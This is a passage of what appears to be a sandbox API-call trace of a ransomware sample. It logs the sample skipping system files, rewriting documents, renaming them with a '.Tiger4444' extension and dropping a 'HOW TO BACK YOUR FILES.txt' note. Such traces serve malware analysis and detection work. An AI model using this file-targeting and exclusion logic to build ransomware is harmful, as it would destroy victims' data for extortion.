returned -1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2="bootmgr") returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2="pagefile.sys") returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2="boot") returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2="ids.txt") returned 1 [0047.107] lstrcmpiW (lpString1="TKlqgRD9 Nr6 m.pps", lpString2="NTUSER.DAT") returned 1 [0047.107] lstrcpyW (in: lpString1=0x30aeafe, lpString2="TKlqgRD9 Nr6 m.pps" | out: lpString1="TKlqgRD9 Nr6 m.pps") returned="TKlqgRD9 Nr6 m.pps" [0047.107] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\TKlqgRD9 Nr6 m.pps", dwFileAttributes=0x0) returned 1 [0047.107] lstrlenW (lpString="TKlqgRD9 Nr6 m.pps") returned 18 [0047.107] lstrlenW (lpString="Tiger4444") returned 9 [0047.107] lstrcmpiW (lpString1="Nr6 m.pps", lpString2="Tiger4444") returned -1 [0047.107] lstrlenW (lpString=".dll") returned 4 [0047.107] lstrcmpiW (lpString1=".pps", lpString2=".dll") returned 1 [0047.107] lstrlenW (lpString=".lnk") returned 4 [0047.108] lstrcmpiW (lpString1=".pps", lpString2=".lnk") returned 1 [0047.108] lstrlenW (lpString=".ini") returned 4 [0047.108] lstrcmpiW (lpString1=".pps", lpString2=".ini") returned 1 [0047.108] lstrlenW (lpString=".sys") returned 4 [0047.108] lstrcmpiW (lpString1=".pps", lpString2=".sys") returned -1 [0047.108] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\TKlqgRD9 Nr6 m.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\tklqgrd9 nr6 m.pps"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.108] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.108] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13856088970) returned 1 [0047.108] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=11334) returned 1 [0047.108] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0047.108] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc718c8 [0047.108] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x2f50, lpName=0x0) returned 0x2c8 [0047.108] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2f50) returned 0xbe0000 [0047.109] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.109] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0047.109] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.109] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0047.109] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.109] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0047.109] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.109] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0047.109] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13856244663) returned 1 [0047.109] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0047.109] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc718c8 | out: hHeap=0xc50000) returned 1 [0047.109] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.110] CloseHandle (hObject=0x2c8) returned 1 [0047.110] CloseHandle (hObject=0x260) returned 1 [0047.111] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\TKlqgRD9 Nr6 m.pps.Tiger4444") returned 71 [0047.111] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\TKlqgRD9 Nr6 m.pps" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\tklqgrd9 nr6 m.pps"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\TKlqgRD9 Nr6 m.pps.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\tklqgrd9 nr6 m.pps.tiger4444"), dwFlags=0x1) returned 1 [0047.111] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=11344 | out: Addend=0xc6f980) returned 22149712 [0047.111] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4847 [0047.111] FindNextFileW (in: hFindFile=0xc72e88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad89f50, ftCreationTime.dwHighDateTime=0x1d4ce19, ftLastAccessTime.dwLowDateTime=0xa6ae00, ftLastAccessTime.dwHighDateTime=0x1d4d11c, ftLastWriteTime.dwLowDateTime=0xa6ae00, ftLastWriteTime.dwHighDateTime=0x1d4d11c, nFileSizeHigh=0x0, nFileSizeLow=0x2c46, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TKlqgRD9 Nr6 m.pps", cAlternateFileName="TKLQGR~1.PPS")) returned 0 [0047.111] FindClose (in: hFindFile=0xc72e88 | out: hFindFile=0xc72e88) returned 1 [0047.111] lstrcpyW (in: lpString1=0x30aeafe, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0047.111] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ac [0047.112] CreateFileMappingW (hFile=0x2ac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x260 [0047.112] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0047.113] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.113] CloseHandle (hObject=0x260) returned 1 [0047.113] CloseHandle (hObject=0x2ac) returned 1 [0047.113] GetCurrentThreadId () returned 0xfa8 [0047.113] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66328 [0047.113] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1" [0047.113] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83510 | out: hHeap=0xc50000) returned 1 [0047.113] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66320 | out: hHeap=0xc50000) returned 1 [0047.113] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1" [0047.113] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\" [0047.113] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\.BFC0E91B00AE8A0620D3" [0047.113] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2ac [0047.116] WriteFile (in: hFile=0x2ac, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0047.118] FlushFileBuffers (hFile=0x2ac) returned 1 [0047.119] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0047.119] CloseHandle (hObject=0x2ac) returned 1 [0047.120] lstrlenW (lpString="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1") returned 59 [0047.120] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0047.120] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd92be3c0, ftCreationTime.dwHighDateTime=0x1d4d217, ftLastAccessTime.dwLowDateTime=0x26ac28f0, ftLastAccessTime.dwHighDateTime=0x1d4c7b2, ftLastWriteTime.dwLowDateTime=0x81199b1a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72d48 [0047.120] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.121] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.121] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0047.121] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0047.121] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd92be3c0, ftCreationTime.dwHighDateTime=0x1d4d217, ftLastAccessTime.dwLowDateTime=0x26ac28f0, ftLastAccessTime.dwHighDateTime=0x1d4c7b2, ftLastWriteTime.dwLowDateTime=0x81199b1a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.121] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.121] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0047.121] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0047.121] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0047.121] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0047.121] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x81199b1a, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x81199b1a, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x81199b1a, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0047.121] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.121] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0047.121] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcc93bb40, ftCreationTime.dwHighDateTime=0x1d4cb6b, ftLastAccessTime.dwLowDateTime=0x12e78bd0, ftLastAccessTime.dwHighDateTime=0x1d4d5ad, ftLastWriteTime.dwLowDateTime=0x12e78bd0, ftLastWriteTime.dwHighDateTime=0x1d4d5ad, nFileSizeHigh=0x0, nFileSizeLow=0xc0f8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NHEaUnME.rtf", cAlternateFileName="")) returned 1 [0047.121] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2="Tiger4444.exe") returned -1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2=".") returned 1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2="..") returned 1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2="windows") returned -1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2="bootmgr") returned 1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2="pagefile.sys") returned -1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2="boot") returned 1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2="ids.txt") returned 1 [0047.122] lstrcmpiW (lpString1="NHEaUnME.rtf", lpString2="NTUSER.DAT") returned -1 [0047.122] lstrcpyW (in: lpString1=0x30aeb20, lpString2="NHEaUnME.rtf" | out: lpString1="NHEaUnME.rtf") returned="NHEaUnME.rtf" [0047.122] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\NHEaUnME.rtf", dwFileAttributes=0x0) returned 1 [0047.122] lstrlenW (lpString="NHEaUnME.rtf") returned 12 [0047.122] lstrlenW (lpString="Tiger4444") returned 9 [0047.122] lstrcmpiW (lpString1="aUnME.rtf", lpString2="Tiger4444") returned -1 [0047.122] lstrlenW (lpString=".dll") returned 4 [0047.122] lstrcmpiW (lpString1=".rtf", lpString2=".dll") returned 1 [0047.122] lstrlenW (lpString=".lnk") returned 4 [0047.122] lstrcmpiW (lpString1=".rtf", lpString2=".lnk") returned 1 [0047.122] lstrlenW (lpString=".ini") returned 4 [0047.122] lstrcmpiW (lpString1=".rtf", lpString2=".ini") returned 1 [0047.122] lstrlenW (lpString=".sys") returned 4 [0047.122] lstrcmpiW (lpString1=".rtf", lpString2=".sys") returned -1 [0047.122] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\NHEaUnME.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\nheaunme.rtf"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.122] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.122] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13857555589) returned 1 [0047.122] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=49400) returned 1 [0047.123] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0047.123] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0047.123] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc400, lpName=0x0) returned 0x2c8 [0047.123] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc400) returned 0xbe0000 [0047.124] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.124] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0047.124] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.124] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76328 [0047.124] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.124] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76328 | out: hHeap=0xc50000) returned 1 [0047.124] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.124] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0047.124] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13857754191) returned 1 [0047.124] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0047.125] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0047.125] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.125] CloseHandle (hObject=0x2c8) returned 1 [0047.125] CloseHandle (hObject=0x260) returned 1 [0047.126] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\NHEaUnME.rtf.Tiger4444") returned 82 [0047.126] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\NHEaUnME.rtf" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\nheaunme.rtf"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\NHEaUnME.rtf.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\nheaunme.rtf.tiger4444"), dwFlags=0x1) returned 1 [0047.126] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=49408 | out: Addend=0xc6f980) returned 22161056 [0047.126] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4848 [0047.126] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbab5df0, ftCreationTime.dwHighDateTime=0x1d4ca5c, ftLastAccessTime.dwLowDateTime=0x9c194390, ftLastAccessTime.dwHighDateTime=0x1d4cb84, ftLastWriteTime.dwLowDateTime=0x9c194390, ftLastWriteTime.dwHighDateTime=0x1d4cb84, nFileSizeHigh=0x0, nFileSizeLow=0x9db, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ulXMy6BOucJen4sW.ppt", cAlternateFileName="ULXMY6~1.PPT")) returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2="Tiger4444.exe") returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2=".") returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2="..") returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2="windows") returned -1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2="bootmgr") returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2="pagefile.sys") returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2="boot") returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2="ids.txt") returned 1 [0047.126] lstrcmpiW (lpString1="ulXMy6BOucJen4sW.ppt", lpString2="NTUSER.DAT") returned 1 [0047.127] lstrcpyW (in: lpString1=0x30aeb20, lpString2="ulXMy6BOucJen4sW.ppt" | out: lpString1="ulXMy6BOucJen4sW.ppt") returned="ulXMy6BOucJen4sW.ppt" [0047.127] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\ulXMy6BOucJen4sW.ppt", dwFileAttributes=0x0) returned 1 [0047.127] lstrlenW (lpString="ulXMy6BOucJen4sW.ppt") returned 20 [0047.127] lstrlenW (lpString="Tiger4444") returned 9 [0047.127] lstrcmpiW (lpString1="en4sW.ppt", lpString2="Tiger4444") returned -1 [0047.127] lstrlenW (lpString=".dll") returned 4 [0047.127] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.127] lstrlenW (lpString=".lnk") returned 4 [0047.127] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0047.127] lstrlenW (lpString=".ini") returned 4 [0047.127] lstrcmpiW (lpString1=".ppt", lpString2=".ini") returned 1 [0047.127] lstrlenW (lpString=".sys") returned 4 [0047.127] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0047.127] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\ulXMy6BOucJen4sW.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\ulxmy6boucjen4sw.ppt"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0047.127] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0047.127] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13858025115) returned 1 [0047.127] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=2523) returned 1 [0047.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89770 [0047.127] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0047.127] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xce0, lpName=0x0) returned 0x2c8 [0047.127] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xce0) returned 0xbe0000 [0047.128] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0047.128] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0047.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0047.128] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0047.128] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0047.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0047.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0047.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0047.128] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13858132807) returned 1 [0047.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89770 | out: hHeap=0xc50000) returned 1 [0047.128] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0047.128] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0047.128] CloseHandle (hObject=0x2c8) returned 1 [0047.128] CloseHandle (hObject=0x260) returned 1 [0047.129] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\ulXMy6BOucJen4sW.ppt.Tiger4444") returned 90 [0047.129] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\ulXMy6BOucJen4sW.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\ulxmy6boucjen4sw.ppt"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\bfXUap4YidEivvL6\\bO1p3mfPqljshov1\\ulXMy6BOucJen4sW.ppt.Tiger4444" (normalized: "c:\\users\\fd1hvy\\documents\\bfxuap4yideivvl6\\bo1p3mfpqljshov1\\ulxmy6boucjen4sw.ppt.tiger4444"), dwFlags=0x1) returned 1 [0047.132] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=2528 | out: Addend=0xc6f980) returned 22210464 [0047.132] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4849 [0047.132] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3b035e70, ftCreationTime.dwHighDateTime=0x1d4d137, ftLastAccessTime.dwLowDateTime=0x5b788690, ftLastAccessTime.dwHighDateTime=0x1d4c691, ftLastWriteTime.dwLowDateTime=0x5b788690, ftLastWriteTime.dwHighDateTime=0x1d4c691, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UQBqZ", cAlternateFileName="")) returned 1 [0047.132] lstrcmpiW (lpString1="UQBqZ", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0047.133] lstrcmpiW (lpString1="UQBqZ", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.133] lstrcmpiW (lpString1="UQBqZ", lpString2="Tiger4444.exe") returned 1 [0047.133] lstrcmpiW (lpString1="UQBqZ", lpString2=".") returned 1 [0047.133] lstrcmpiW (lpString1="UQBqZ", lpString2="..") returned 1 [0047.133] lstrcmpiW (lpString1="UQBqZ", lpString2="windows") returned -1 [0047.133] lstrcmpiW (lpString1="UQBqZ", lpString2="bootmgr") returned 1 [0047.133] 